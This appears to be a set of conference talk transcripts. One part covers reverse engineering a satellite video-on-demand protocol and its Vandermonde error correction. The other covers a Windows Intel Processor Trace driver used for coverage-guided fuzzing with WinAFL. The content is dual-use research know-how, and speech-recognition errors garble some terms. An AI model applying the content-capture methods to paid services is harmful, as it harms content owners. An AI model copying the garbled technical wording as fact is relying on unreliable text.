the potential spikes in IO blocking were reduced significantly. So you can see this improvement in the lower VM stat output and you can just see it's like writing a consistent 8,000 in each sample. So after tweaking the VMDirtySettings, my client was able to write data reasonably. Well, but I still ran into problems doing other file system manipulations and very specifically deleting a file. Up until this point, I was just using the EXT4 file system that is the default with Linux. I never had any reason to use anything else as it met my needs. I started researching file deletion times in the larger file. And the larger file is in the EXT4 the longer it would take to delete due to inodes being fragmented. I did some work on MythTV years before and I remember the hardcore users recommended something other than EXT4, but I couldn't remember why. It turns out that the long deletion times were causing the IH. It turns out it was long deletion times causing IH issues. I did a little bit more research and I started trying various file systems. I ended up settling on XFS. Two main reasons were that you can control how large a block of the disk was allocated at a time and the file deletion time was always fractions of a second regardless of how large the file was. The large block allocation was also very useful since almost every file downloaded was multiple gigs. I set that value to one gig. And there's some XFS tools to see how many non-contiguous blocks a file takes up and with one gig setting even for really large files in the order of 20 gigs or more, it's still split up into a few pieces. So by this point I was able to store just about every media file from the video and demand distribution system. But I still had problems here and there due to reception problems. But overall I was able to complete 95% of more of the files and buffer overruns due to IO or a thing of the past. So although I was quite pleased with being able to store and organize the files due to the nature of satellite transmission, I would quite regularly be missing a few packets from transmissions. It was quite frustrating to be missing one to two packets from a 20 gig movie. So eventually I decided that I should take a look at the FEC. Often to that point I didn't understand much about FEC aside from the high level of data protection using some fancy method and understand. At some point I found the vendor's website and mentioned using a proprietary FEC method. So I started to do some research in FEC and I started looking at the files I was downloading for any clues on how I could use to focus my energy. I knew the FEC data always fit exactly into the packets and I knew there was no padding. There was no padding on the FEC data like there was on the actual file. So this led me to believe that it was block based. I also noticed the ratio of FEC data had a close correlation to the file being transmitted. I started examining other systems that use the same protocol. I noticed this ratio differed a little on different systems. C-Band tended to use less redundancy than KU. This most likely is because C-Band is less sensitive to interference and signal loss than KU-Band. So one of the more important observations that I happen to notice is a single packet transmissions FEC was an exact copy of the payload. So this slide is an example of a two packet file that was 2600 total bytes. You can see the contents are the same at byte 0 and at byte 1300. And up until this point I was mostly overwhelmed with attempting to know where to start because I had focused my energy on the large files for some reason. So I started examining the smaller transmissions and started collecting samples of two, three, and four packet transfers. At some point during my research I had done patent searches and come across some potentially useful FEC schemes but hadn't been able to make sense of them. I eventually went back to these patent documents and started trying to piece together how it had all worked. It was this mundane patent search that actually proved to be the breakthrough I needed. I just didn't know the answer was sitting under my nose the whole time. So from this point on I started researching all the math mentioned in the patent and trying to remember how matrix math worked. I had to learn all about finite field math, Galway fields, and matrix math. Over the course of a few weeks and many sheets of paper I managed to calculate the FEC of a small file examples by hand. I don't want to turn this into a long math lesson but I want to walk through the high level overview of how the math works for the FEC system. So a key part of the forward error correction is Galway field arithmetic. A Galway field has two important properties. The first is that it's a set of integers that math operations, addition, subtraction, multiplication, and division between the integers are another integer in the set. The second property is that the field is finite. The FEC scheme that I'm speaking of and in fact most others are a set of algebraic equations that are used to calculate the missing elements from the other. So performing the math operations in a Galway field are different than standard math. Addition and subtraction are just X or multiplication and division are a bit more complicated but the total possibility for a 2 to the 8th field or small can easily be performed in a computer with a lookup table. All Galway field math is done using a primitive polynomial not reducible by any other polynomial. In the case of the 2 to the 8th Galway field, the polynomial is represented by the X to the 8th equation there on the bottom. So this is the same polynomial used for QR codes, Reed-Solomon, and lots of other error correction schemes. So the FEC method I employed, I found out later, was called the Van der Maan FEC method. It consists of the basic equation. Y to the K equals X sub n times G. Where Y to the K are the transmitted code words, those are all the packets with the FEC data. X to the n is the original data and G is this n by K generator matrix. And you can get back X to the n with the following equation which is X to the n equals Z to the n times A to the minus 1 which is your repair matrix. So the second equation, Z to n is where you receive code words and A to 1 is the repair matrix that's based on your generator matrix. You have to have at least elements of Z to be able to recreate X. So the whole principle of the FEC system is you have a system of K equations and n variables. So if you have at least n pieces, you can solve for the missing values. So what does all that mean in a real world implementation? Well, let's roll up our sleeves and do some matrix math. For example, I'll do a demonstration on a 2 by 3 FEC scheme. This means there are two bytes that we want to protect using three bytes. It's a small enough example. We can do it quickly and yet the whole process will be understood. So the first step is to build a generator matrix. For this example, it'll be 2 by 3, it'll be a 2 by 3 Vandermonde matrix. And this is the equation right here. And basically, it's just a simple geometric progression. So the actual, so the 2 by 3 Vandermonde matrix for the Galois field to the 8th is figure 5, but this isn't the generator matrix. To create the generator matrix, we need to get it to standard form by reducing it. I'm not going to get into this, but that's what figure 6 is right there. And you'll notice that the 2 by 2 part on the left of the matrix is all ones in the diagonal space. It's called the identity matrix and it'll prove, it'll also prove very useful features later on in the FEC scheme. Okay, so for the two bytes that we want to protect, they're 1 F and F7. And I got these values from actual packets and you can see that in figure 9 here. So now to do the math, I don't know how many of you remember how to do matrix multiplication, but I'd completely forgotten. In a quick review, you flip the 2 by 1 matrix on its side and leave the 2 by 3 matrix alone. You multiply the 2 by 1 matrix on the left with each row and end up with a 3 by 1 matrix. So to do the math, you multiply 1 F by 1 and F7 by 0 and you follow this through for each of the three fields. So in a Galois field, anything times 1 is itself and anything times 0 is 0, so that makes 3 of these easy to see. The first byte of the code word is 1 F and the second is F7. The last field, I'll give you some help. 1 F times 3 in the Galois field is 21, F7 times 2 is F3 and 21 X word F3 is D2. So D2 is the FEC value which would be in the third packet, the byte transmitted in the third packet. You also notice the great property is the first two bytes of the code word in the original form are the same. Just because the left section is always the identity matrix as I mentioned earlier. This is the case for any FEC data rates. It also means that all the bytes that are written to disk for a transfer won't have to be altered later. So now that we've been able to generate the FEC, the next question is how do we get the data back out? So let's say in our example from before that we get the first packet and the third packet and we've lost the second. Once we've got two packets of the code words, we'll be able to generate the missing byte from the second packet. To do so, we need to build the repair matrix. Now to do this, we take rows from the generator matrix for the packet and we build a 2 by 2 matrix. In this case, it'll be what you see here in figure 13. The one in the zero correlates to the first packet in the three and two are the generator matrix's third field. So the matrix needs to be inverted to create the repair matrix and I'm going to spare you that trouble and that's figure 14 there. So this gives us A inverse, which is what we use to generate X sub n. So now we multiply the two bytes that we have, 1 FD2 by A inverse. Now the math is the same as before, basic matrix arithmetic. Now it's a very simple example, but that explains the process. I did numerous examples on paper before I was able to understand it enough to do much in software. So now that I understood how the FEC process worked, I started to work on a software implementation. Luckily, since Galway Field Math is very standard computer science, it didn't take long to find some code online to build multiplication division tables. Once I did that, I wrote a few functions to reduce and invert the matrices. By this point, I had all the mathematical tools and software and needed to weave it together to be able to do the FEC. So for this part, I modified my software to stop chunking the FEC data out of the files when I saved them. I collected a few examples of complete files with complete FEC repair sections. And since I should be able to generate the FEC sections as well as repair sections, my first step was to write software to verify the FEC data fields in the saved files. Didn't take very long to implement distance software for files that consisted of less than 100 packets, but after that, I ran into problems with files that consisted of 101 packets. I made the assumption that 100 must not be some arbitrary limit, and the programmers had decided on it for some reason. It turns out that after 100 packets, the packets are relieved, so that 100 by X is the largest scheme. The interleaving data rate was easy to calculate based on the total number of packets divided by 100. And any packets that weren't present to get to the even 100 were just considered all zero. So all of these little things necessary to do a complete implementation were easy to test and software with complete file and FEC sections to test against. So by now, it was elated that I was able to repair bad files, but I was still not totally sure what the FEC rate would be. I could make some assumptions based on the total file sizes, but I took a look back at the myriad of unknown sections in the 03 packets from much earlier, and sure enough, there was a field that correlated the FEC and data rate. It was a 32-bit field after the file name. The only reason that it wasn't obvious was it was stored as the FEC value times 100. So if the FEC scheme was 100 by 106, the field would be 10,600. So once I had this last piece of information out, it was time to try and do it in a real time on the live stream. So the time it takes to build a generator matrix, which is the basis of the repair matrices, is quite quick for the 2 by 3 example I just presented. But with a larger FEC rates that are used in a field such as 100 by, and such as the repair is 100 by 109, takes much longer. So I pre-calculated the generator matrices, and I stored these in a header file that was compiled into the executable. I only stored the section of the generator matrix used to the right of the identity matrix. And once I implemented the FEC, I was able to emulate as far as I could to tell the entire protocol. So if I ran into any IOW errors, the FEC was able to repair these in short bursts. So in conclusion, the biggest challenge of the project for me was the FEC is the math was something I never really dealt with in my schooling, aside from remembering it long enough to pass a test, and that was it. So I'm sure you'll be wondering about the video demand system if it's still running. The system is running, but all the files now are encrypted, and using some sort of scheme based on AES-256. So hopefully I've explained all this in a way that's easy to understand, and thank you for listening to my presentation. So once you've applied all the error correcting stuff, what proportion of the data stream were able to decode successfully?
|
The presentation will cover reverse engineering a satellite based IP content delivery system. These systems are generally used for moving digital media (such as movies, video on demand) but also can be used for digital signage and any other type of files. The presentation will touch on all aspects of reverse engineering from satellite reception, packet analysis, forward error correction reverse engineering (along with an explanation of the math), to the difficulty dealing with the extremely constant high bitrates on an off the shelf linux PC. The end result of the entire reverse engineering project was a linux based software client that has similar features as the commercial version based solely on an analysis of the protocol and incoming data.
|
10.5446/32382 (DOI)
|
Okay, before start a brief introduction about us, I'm Andrea Llevi, I'm a security research engineer of Microsoft. Now I have worked for three years for the TALOS team and I'm specialized in Windows internal and low level reverse engineering. I have a previous worker for Prevex, Webroot and Saferbeds that are companies and located even at one easy in Italy. I'm the original designer of the first UFI boot kit in the year 2012 and the first patch got the 80.1 bypass presented in the year 2014. I'm one of the designer of the Windows PT driver that we are going to present. And I'm Richard Johnson, I'm the research technical lead for Cisco TALOS. We have a team that does vulnerability research and I help guide those efforts. You may see some of our vulnerabilities in the past year and we focus on technologies mostly for finding bugs. And so this was, as he mentioned, some of my talks the last couple years at recon have been in the focus of high performance applied to fuzzing and engineering technologies that give us feedback driven fuzzing and componentizes the different parts of the process to try to make it as fast as possible. I came across this new architectural feature in Intel CPUs called Intel processor trace about two years ago and basically it's a hardware supported mechanism for doing code coverage and I made a prototype for this in 2015 that worked for Linux because there was experimental support via some open source drivers. After evaluating it I realized that this would be a great thing to bring to the Windows operating system but the Intel support for it was not going to be suitable for what we were looking for. So last year at recon we had our very first version of the Windows driver working like an hour before we got on stage and it was doing a raw decode and so we're going to talk about the last six months of developments which have brought all kinds of support to the driver and this picks up where the last one went off. So Andrea is going to give you the introduction of the technical details of the driver and the low level implementation and some demos and then we'll address that as applied to fuzzing and finding bugs. Okay, speaking about processor trace, the processor trace is a new feature of the latest Intel Skylake CPU. It's very useful because it can trace whatever your CPU is going to execute like in hardware and it has some particular benefit especially for dynamic code coverage. For example if you would like to understand what a particular piece of software would like to do for malware analysis or for whatever. I mean the usage are various. I would like because we have not a lot of time I would like to be quite fast in describing how the Intel PT is executed in a CPU and I would like to concentrate on the new feature of our driver. Basically being fast to discover the Intel processor trace in a CPU you can do even in user mode only emitting to CPU ID instruction with two different leaves. One is used to detect the support for Intel processor trace. The second one is used to detect the feature of processor trace because different CPU can implement different features. Processor trace has been implemented in the first time in the first in broadware architecture but it was limited. Now in Skylake there is the full support and you can trace whatever you would like. On CPU there will be a release of Intel in the second quarter of 2017. They are quite run. Okay, here in this slide I would like to show the code for detecting the processor trace. As you can see it is quite easy and there is nothing special only a pair of CPU ID instructions. Okay, let's speak about why it is so interesting. It is because it is implemented in T-Railin hardware. One of the basic things that we can say about this is that it is not detectable by software, I mean in user mode software. One important thing to say is that you can trace whatever you want. Even SMI, SMM, handler, even an hypervisor code or whatever. The only thing you can trace is like the SCX secure container but it is a good thing because the SCX by design should work in an inosolate environment. Okay, even here quite fast how it works. The processor trace works in three modes. It can trace using three different kinds of filtering. The first is by current privilege level. I mean you can differentiate between kernel mode software and user mode software. The second filtering mode is by PML four page table. In that way you can trace only a single process because you can track the processor trace to trace only a specific PML physical address page table. In that way you can trace only a single process. Otherwise the last filtering mode is by instruction pointer. You can set a start point and the end point and ask the processor trace to trace only that window of code. And this is very cool. The output logging is done directly in memory, in physical memory. That's why we need a driver to manage that. And the logging could be implemented in two things, in two ways. The first one is single range. There is a circular buffer and the trace is written always in the same place in memory. The second type is the table of physical address, also known as TOPA. Okay, even here like quite fast. To implement the single range you should allocate a continuous physical memory buffer. And then you should set two proper mode specific registers. One is the RT high T output base and the output mask. And then you have to start the trace setting the trace PML flag in the counter register. The buffer is automatically filled in a circular manner by the CPU. The table of physical address. The table of physical addresses is a better implementation of the output because you can set various physical memory address and you can create a like table in which you instruct the CPU where to write exactly memory. It's very smart because you can even set up PMI interrupt that is raised by the CPU if a certain part of the buffer is filled by the log. And then you can stop, you can resume, you can do whatever you want. Okay, different kind of packets. To log the software execution, processor trace uses a different kind of trace packet. There are a lot of timing packets that we are not interested in. The packet that we are interested in are the branch packet. They are taken, not taken. They target the PM flow update packets. Those packets are the most interested because with those you can trace the execution of the software and follow its execution even maybe checking the assembly code. Here is a big diagram. I will refer you to the internal manual if you would like to understand the nitty-gritty details of each packet. The one that we are interested in are the branch packets. They are not taken, target the PM flow update. Okay, let's speak about the Intel PT driver implementation. Okay, we have decided to write this driver to be able to perform the trace directly from a Windows operating system. At this time of this presentation, the driver is quite stable and version 0.5. It supports all the filtering mode combination and output modes. Some new features of this release is that it supports even multi-processors and this supports even kernel mode code tracing. As I have told you, you can use the processor trace to trace even kernel software without any problem. In the developing of this driver, we had overcome a lot of problems. One of the most big problems are the mapping of the PMI interrupt because there was no documentation at all for how to do that. Even the multi-processors because you have to manage and you have to enable the processor trace to once in each processor. Okay, let's speak first about the PMI interrupt. The PMI interrupt has been raised by the processor trace when our buffer is full. To do that, we have programmed the table of physical addresses in inserting this PMI interrupt request at the end of the buffer. How we can be able to manage that? When the PMI interrupt raise, we suspend the target process, dump the physical memory and then resume. We had some problems implementing this because as you probably know, all the interrupts inside the X86 architecture run at a very high, higher quell. This is quite a problem because from that code, you can do quite anything. Even the user mode buffer, very fast even here, we have found a way to directly map the physical memory in a user mode buffer. We do this in a smart manner. I think it's not we respect the security boundaries and we map it only the log buffer and that's all in user mode. Nothing kernel mode is important because if you use a very big buffer, you have the problem that for the virtual address space, that's now it's not a problem in 64-bit systems, what could be? Okay. Here is where the things get interesting because in version 0.5, we have been able to support the multiprocessor and multi-thread application. Each CPU, as we have implemented in that way in which each CPU has its buffer associated with it and it's mapped in user mode. We signal a PMI interrupt where the buffer will be filled. But here, there is a problem because if we fired the PMI interrupt in the same way, the user mode application is not fast and is not able to detect which CPU is as the buffer full in a real-time way, in a fast enough way. Then, we have switched the implementation and implementing the user mode callbacks. I mean, our user application has spawned one thread for each CPU and each thread registered a PMI callback function in that way when a CPU has the buffer at this full called the exactly right user mode callback. Here, we have tested that even in a real big multiprocessor environment, if we don't decode in real-time the binary log to transform it in a human-readable text, the performance is really good. I mean, we can't see some slowdowns or something in the Traced application. Speaking in summary, we have overcome this problem, but the only problem that we had is managing a multi-threaded application because as you already know, for a CPU point of view, a thread doesn't exist. I mean, the CPU is executing some codes. That's not the CPU doesn't know if it belongs to one thread or another one. Okay. If you try to launch CALC, the standard calculator in Windows 10, you will find that it's not a standard process. It's a new upcontainer process that spawns another process. This is an example of the increasing complex of the even the standard process that spawns another process or multi-threaded. Here, it could be a problem for our tracing purposes because of that. To overcome that, we can identify the paging information packets of each process and use the processor tracing only an instructing it to filtering by CR3. But we have a big drawback because the size of the log is huge. I mean, in that way, you trace all the process of the user that runs in user mode, all the loader code, whatever. This is a problem. The second way to overcome this could be to register a process through the creation CALC in kernel mode and then trace only one process at a time. This solution is simple and it works. But sometimes it's not acceptable because, for example, some hardware or some complex component like, for example, Microsoft Word, require the interaction from different process. This is a problem. But we are researching a new way to do this because originally we would like to enable processor trace by each thread, by using a thread construction. The thread is known only in software. Only Windows kernel know how to manage the threads. Our original idea was to intercept the thread context switcher code and save manually all the mode specific registers used in processor trace to an area and then restore back when the context switcher restore the original thread. When I was doing this, I was manually saving all the mode specific registers on an external buffer. But someone has been pointing to me on the existence of another very cool instruction that is not known by the research community but is very useful. Do you remember the old push-ad instruction in X86 architecture? Basically what it does is it pushes all the general purpose registers in user mode stack directly only using one instruction. Now in 64-bit environment, something like that doesn't exist anymore. But Intel has made this new cool instruction called XSave. The XSave is a new opcode in the MD64 instruction set that basically saves all the some extended registers, some registers that belong to the Intel architecture on a specific area. I have found that the XSave instruction can save MMX, SSE, AVX, AVX registers. I have written here that what is AVX 512 because I didn't know the existence. The cool feature about the XSave is that it can save even the register that belongs to Intel processor trace and the new Intel memory protection extension. And it is very cool because using only one instruction we can save all the registers that belong to the processor trace directly in a very, very fast manner without any problem. If you open the Intel manual you will find that you use this instruction, it's a bit complex because there is an XSave instruction that belongs only to user mode. And to set what to save you have to set an extended control register in user mode using a new instruction that's called XSBV. But to be able to save the mod specific register directly you have to use another instruction. You have to use the XSave S that it means XSave supervisor and it's good to use it in kernel mode. Our driver supports completely the XSave. And it was very funny because when I implemented this I have found that the new Windows 10 context switch already implemented the support of this XSave but only for user mode. Our original intention was to find a way to intercept or divert the key swap context routine that is the kernel mode routine that Windows uses to perform the context switcher from one thread to another thread. If we are able to intercept this we can save all the mod specific register belongs to processor trace directly in an area and then restore later. In that way we can implement the tracing by thread that is a completely software, it leaves in a completely software point of view. But we found some problems because as you probably know you can't touch any kernel mode in an official way using for example an hook, I don't know a code diversion or whatever because otherwise Pashkar will blue screen off that your system. And we found that this way is not feasible in a public system. We can use our debug system. In a debug environment you can do that and Pashkar doesn't run and it's not a problem but it's not a viable way in a production system. The second solution that we found is the usage of ETW. If you check the documentation about ETW there is a way to intercept the context switcher but it's we are still doing some research because the API are very complex and we are trying to get if we are able to use in a legally way ETW to implement the trace by thread. Another cool feature of the new relays is that the driver now fully supports the kernel mode tracing. We have implemented 11 new kernel APIs that you can attach to your driver and you can use it manually to decide what to trace, how to trace and to do whatever from a kernel driver. But we were not happy with this because we would like even to implement the tracing from a user mode application. Then we have created some high-octls that you can communicate with our driver and it's able to do kernel tracing directly from user mode. And to do this we have overcame a lot of security problems but now you can do that. From our user mode application you can even trace the kernel code. I said I wrote here that in this way we are able to for example trace the loading or unloading of a kernel module or even if maybe you are studying some high-octl in a root kit or whatever you can even trace only the high-octl code because as you know the high-octl in kernel environment are processed as synchronously when a user mode application asks. Okay, some quick words about how to use the driver. As you can see the code is quite simple. First of all you have to grab an handle of our device. It's quite easy. The device name is named Windows Intel PT Dev. After that you have to fill a data structure named PT user rig that is in our request and then you have to ask the high-octl manager to send the high-octl to our device. As specified the user request. After all, after this the trace starts. You can decide where to stop the trace using another high-octl. This is very important because if you close the application without doing that it means that your processor is still tracing something and this could lead to a problem if you try to upload our driver because the processor is not cleared. But the driver is able to detect this and to overcome this. But it's a good practice to do that. For multi-processor code you can spawn a user mode thread directly without any problem and then from the user mode thread you have to call the IO manager to send the register PMI routine high-octl to our device. That's all. Then you wait in an infinite loop. The only thing to take care is that there is a parameter in the sleephacks function that is named a table or not. You have to insert through. That way every time the CPU buffer gets filled the callback will be called without any problem. Now it's time for a demo. I don't know how much. We have to be very fast. I have prepared a demo for you. As you can see there is the code of a very simple application. It asks only some questions to the user. Let's try to run it. No kernel trees. Target process is our simple application. Andrea, you can see here. Just a moment. How many CPU? At the beginning let's do one. Only one CPU. He is asking you to increase the font size. You can mirror it. While he is setting this up I will recap what he went over. When we presented it last year in June all we had shown is the raw code. He is going to show you a tracing in different modes and visualizing it in IDA. How many conferences have you attended? Let's say three. The application has ended saying you are on a good track. Let's exit and try to open the executable using IDA. Here is the code. Our goal is to trace the software. We have developed IDA plugin that does this for us. Let's feed it with the text log. Wait a moment. An exception. As you can see, this is exactly the code that it has run. The exception was not voluntary. We use a library from Intel called lib.ipt. It provides the decoding of the binary trace to a text file that we are parsing in the plugin for right now. Later we will integrate the decoding within the plugin. I would like to show you the same with the multi-processor environment. Let's see where is the part of my process. How many processors? Four. Now let's say eight conferences. The results are different. You can see in the summary each processor has its own buffer with different number of packets. It is this dump. As you can see, there are different binary files and text files for each processor. Now we will increase the font size. Can you see guys? As you can see, this is CPU number one. It has all the packets, the taken not taken and the paging, paging generation, enable and disable. Because the context switcher of Windows switch to different threads. This is one CPU. But for example, if you are lucky, we are not lucky. There is even some logs that are quite clear because it means that the Windows has executed these executables only for a small period of time. This is not the case because luckily the context switcher runs for each different CPU. But sometimes it happens that even the log for one processor is empty. And this is our implementation. Can you pull up one of those text files again? Okay. I just wanted to point out. So when you read these text files, you can see that for indirect branches and return addresses, we actually get the full 64-bit target address. But if you look at the TNT packets, those are indicating whether or not a conditional branch was taken. So they only store a single bit that determines whether or not you took the true or false branch. So you have to recover that later on and disassemble in real time to recover what the target addresses were for those conditional branches. We have time. Yeah. I would like to show you an experimental demo that uses kernel tracing directly for user mode. For this demo, I have chosen ACP driver, not for a specific reason, because it was randomly chosen. And I found that the system calls this interface a lot of times. Let's try to do even this, to take even those dumps. The explorer has been blocked. Amazing. Okay. Let's say yes, ACPI.cs. Let's say go, number of process of CPU, just one from this time. Okay. It asks, I'm tracing, do something and then stop me. I do, for example, some movement on my PC. And then at a point of time, I will say stop. In this time, we were quite lucky because, as you can see, the process on number one has taken some packets. Let's see what are those packets. Okay. As you can see, there is not so a lot of time, a lot of things registered here, but something has been taken. Let's try to use our plugin to be able to trace what you can see. This is the code of ACPI. Unfortunately, I have no symbol about this because it's an in-flight release of Windows 10. But let's try. Okay. The plugin has worked. You can see now because the driver entry has never been called, has been already called when you have switched on your system. But if you see the log, there is a lot of time called this special function. That could be an IOCTL or whatever. Let's try to go. Yes, this is IOCTL. You can see. Just a moment. This should be blindly without knowing anything about the interface of the driver. We can probably say that this is an IOCTL because the code is executed a lot of times because for the color, the color is darker. It means that the CPU has executed this function a lot of times. As you can see, there are traces of all the branches. This is... Ah, come on. It's not taken. And you can see there is the branch. And all the branches are traced. And that is the demo about the kernel tracing from user mode. From kernel mode, if you develop your driver, you are even being able to trace the driver entry or driver unload routine. I can show that right now because first we don't have time and second, my computer is switched on in a relay's environment. Because for doing that, of course, we can't use a signet driver. But it's feasible. If you do that, if you write your kernel driver and you sign your kernel driver, you can do whatever you would like. Okay, let's write it back today. So now we'll switch. Oh, okay, yes. So yeah, to recap, the driver now supports kernel tracing and user mode tracing. You can filter based upon the CR3, so a single whole process. You can trace the entire kernel space or you can isolate ranges of contiguous IP. And you get up to four different ranges. So now I'm going to demonstrate this in a practical real world scenario inside of AFL. So we have this fast tracing engine and you'll see some performance numbers that are real world here. But in the manuals, they are targeting a 5 to 15% trace overhead for the entire system. So per core, you should be able to trace both kernel mode operations and user mode operations for only 5 to 15%. And I'll actually be able to show you that and how that works. I'm sorry. Yes, yes. Oh, I'm sorry. That will help. That's one. Yes. Okay. So how do we use this and apply it for vulnerability discovery? So who here is familiar with American Fuzzy Lop? Has used it? We have people who do fuzzing in the crowd. Okay, a good portion here. So in the last few years, we've seen, well, an evolutionary jump in fuzzing technology. Basically, we've gone from using dumb fuzzing or grammar-based fuzzing that wasn't able to determine whether or not the samples that were being generated were useful to applying a new technology or engineering an older technology into something that's performant enough to be used. And we call that evolutionary fuzzing. So we take the idea of dumb fuzzing mutation and we combine it with the ability to collect a feedback signal using code coverage. And then we assess the fitness of that new randomly generated input against the entire lifetime of your fuzzing cycle. And so basically what we can do is we can look at this code coverage information, determine if this newly generated input actually gets us to a different part of the code. If it does, then we'll introduce that into our entire pool of samples and continue to mutate and fuzz those as we go. So over time, we're refining our set of inputs and getting, we're building a corpus and each one of those inputs exercises a slightly different part of the code. And in effect, what we've seen is the last three or four years since this has been available, this has highly optimized your compute time when it comes to doing dumb fuzzing. And so the last couple of talks I've given have focused on this technology. And so I encourage you to go look at previous slide decks which are on the recon website or my website at moflo.org. But basically through researching this, I've resolved that the main things that we need to effectively deploy this technology is we need a fast tracing engine. And of course, that was the inspiration to look into Intel processor trace because the promise of 15% overhead against closed source binary software is pretty incredible compared to the technologies that we've had available before. Previously, hardware tracing is not new to Intel. Since the P4, there's been the ability to do hardware tracing. There's mechanisms called branch trace store, BTS, which is works in a similar fashion, but was not designed in a way that was optimized. It didn't write to physical RAM. It polluted your cache and things like that. So we saw a massive slowdown. And then you have another option which is called last branch record, which is only 32 registers and modern processors. And those only give you the last 32 branches. So you'd have to interrupt every time every 32 branches to parse that and use that. And or you'd have to write a driver that flushes that out to a different cache and do other things. So while this isn't new, this is designed for the first time to be highly performance up until Intel processor trace. It was actually faster to use software based tracers, things that would do dynamic binary instrumentation using Dynamo Rio or PIN or something like that. So now we have this fast tracing engine. That's great. We need fast logging, which is something that we get out of the design of AFL. AFL uses a bloom filter that allows you to quickly look up whether or not you've done the same code coverage. So instead of parsing a text file or binary file, that's just a list of addresses of basic blocks consecutively. We actually parse that real time and fill a bloom filter. So you can just check to see if this 64k of RAM is identical to another 64k of RAM instead of doing a comparison of each address. And then through some of my other research, there's been other attempts at evolutionary fuzzing starting about 2004 or 2005. Jared DeMott did some of his PhD research on this, and he had something called the evolutionary fuzzing system. But it was based upon basically the BTS record or debugger breakpoint. So it was quite slow in its tracing. And then it was also over engineered and trying to incorporate too much of the research that's in evolutionary, like, biology side of things. So the key is to have this fast tracing engine efficient logging and to keep the analysis to the minimum. So in 2013, Michael Zolesky, who's contributed a lot of great stuff to our industry, produced the first performant open source evolutionary fuzzer called American Fuzzy Lot. It uses a pretty comprehensive list of types of fuzzing strategies, whether it's bit flipping, byte flipping, d-word flipping, and so on, crossovers, and various types of mutation. It uses, originally it used block coverage via a plugin, a post process of the GCC compilation. It would compile your code to assembler and then annotate the assembler to add callback hooks at every basic block entry point. And then that's, through that modified source code, that's how you got your code coverage. And then, as I mentioned, he takes those edge transitions, basically shifts and zoars them together, and then increments offsets into this bloom filter or byte map that is basically able to track, you know, whether or not you've seen this edge before. Now, you can't get out what those addresses were originally because it's simply an offset into this mapping, but you can very quickly look up, have I been here before? And that's all we care about as far as whether or not to keep that sample. And then, of course, it was written on top of the POSIX API, so it wasn't Windows-compatible out the gate. The benefits that it has, it tracks edge transitions and not just block entry. It uses the bloom filter. It had a fork server built into it. And then, basically, after your process has initialized, it waited until all your libraries are loaded and all the linking and everything is done. And then once you get to the parser code, then it would fork. And so, you skip all that initialization time, which is an optimization. And then, very importantly, he introduced persistent mode fuzzing, which is an in-memory type of fuzzing where you're not exiting and recreating the process every time. So, you're giving it a pointer to a function and the number of arguments to that function and saying, okay, once you exit this section of code, start over again and take our new inputs as inputs to this function. And so, that also reduces the amount of code that you're tracing and executing down to the minimal points as an optimization. And then, importantly, you can use this to build a corpus on open-source software. It's very fast, and so you can use those as inputs into your pipeline on maybe slower or more heavyweight analysis on other types of fuzzing. So, the way they do their tracing is every block gets a unique ID. The edges are indexed in that map. It creates that hash using the shift and zore, and then we increment the map. So, this was great. I was looking into this and how to optimize this and bring this to the Windows platform. Obviously, we can't use source code instrumentation for the majority of the software that we're targeting, so we needed something that could do binary targeting. And so, this seemed ideal versus the other options of using PIN or Dynamo Rio and so on. And so, last summer, we decided to start looking into this. Well, around that same time of my talk at Recon last year, Ivan Fratric from Google, I think he's Project Zero or Google Security, released Win AFL, which was a port of Michael Zeweski's AFL to Windows using Dynamo Rio as a backend. Are you guys familiar with PIN or Dynamo Rio? They're basically loaders for your program, and as you visit each new basic block of code, it caches that and allows you to modify it in real time. So, it's a kind of, Valgrind works the same way if you're familiar with that. So, it was using that as a backend. It's really cool. It works. It was like the first thing that you could just go download right now and start fuzzing Windows GDI in five minutes. Beautiful. The biggest thing that's allowed it to be a performance is that it uses this persistent mode where it doesn't exit the process. So, these loaders like PIN or Dynamo Rio, they have to disassemble your program to instrument them. So, he was able to, and I did some experimentation on trying to do forking in Windows previous talks, and it turns out it's just real pain. So, using persistent mode, you get things like, you don't have to worry about ASLR because you're not exiting the process, and you don't have to re-disassemble the process every time because you're using that code cache. So, Win AFL turned out to be pretty well engineered. And basically, you can tell it how many iterations to persist, like, you know, maybe do a thousand iterations, and then go ahead and exit and restart the process so that we can, if we have any memory leaks or we're not quite cleaning up properly, we can just handle that through delaying the restart. Now, persistence is key because every time you load this in the DBI, it's going to disassemble it. So, if we were to just do it every time, we'd get two executions a second on this GDI plus demo I'm going to show you. If we persisted 100 times before we restarted 72 executions a second and so on, it reaches its ceiling somewhere around a thousand or so iterations. So, we have now integrated our Intel PT driver into Win AFL as an alternative tracer engine. And now, this brings some problems because the reason I had him show you the text version of that dump was that we don't have all the addresses in the log file. So, we have to recover some of those along the way. We don't have persistence mode working quite yet, unfortunately. I have done some experimentation here. It's around the corner. By the next time we present it to Hack in the Box, this will be available. I'm building my tooling on top of Alex Inescu's great work from last year at Recon on the application verifier hooking system. And so, basically, as it is, I'm using the IP filtering mode so you can specify up to four DLLs that you want to trace or, you know, four modules or any address ranges in your process that you want to trace and so on. The current status now is that we do accurately decode the full trace, so doing disassembly online and using cache for the control filigree that you recover. So, I first looked to see if we've already resolved what this upcoming conditional branch is. And if so, then it's a quick index. If not, I have to disassemble forward to determine the targets for the conditional branch and then store those in a structure. The edge and source destination are recorded as expected, so we're not reduced to basic blocks. We actually do get the edges. And I'm currently just using create process, so we're doing this iteratively rather than forking or persistence mode yet. So, in order to determine the performance of this tracing mechanism, I first made a dummy looping benchmark. So, basically, it was just creating the process and waiting for it to exit. So, we get our kind of maximum bounds on how many iterations we'll be able to execute with a sample. In this case, I found that we could get 85 executions a second without doing any tracing. We're just generating the fuzzer input and running it without anything like that. We're not parsing the log file. We're not doing anything. So, once we enable the tracing, that was reduced to 72 executions a second, which is right in that sweet zone of 15% overhead that Intel was promising for this particular sample. So, parsing the log file was an additional 22% overhead. So, now we're down to 55 executions a second. And I'll demo what this all means for you here. So, we'll compare it to the... I'm going to show you... So, we're going to fuzz GDI plus. This is an experiment that comes with the Win AFL out the gate. You just pass it some image files and it uses Windows to render them without rendering to the screen. And this is a live demo of that working. So, currently this is using Dynamo Rio in persistence mode with the maximum number of iterations possible. And we see that it's getting 127 executions a second. The lighting is not good here, unfortunately, but hopefully you guys can see that a little bit. I can increase the font just quickly here. So, what we're looking at here is this number specifically. So, we get 126 executions a second using Dynamo Rio versus GDI. So, let's see how our Windows PC driver performs in comparison. Sorry, that's me decoding the log here. So, let's redirect that out to Noel. Okay, so we're seeing with that overhead of the 15% for tracing and then the additional overhead of 22% for decoding. This will creep up a little bit, but we're only getting about 40 something 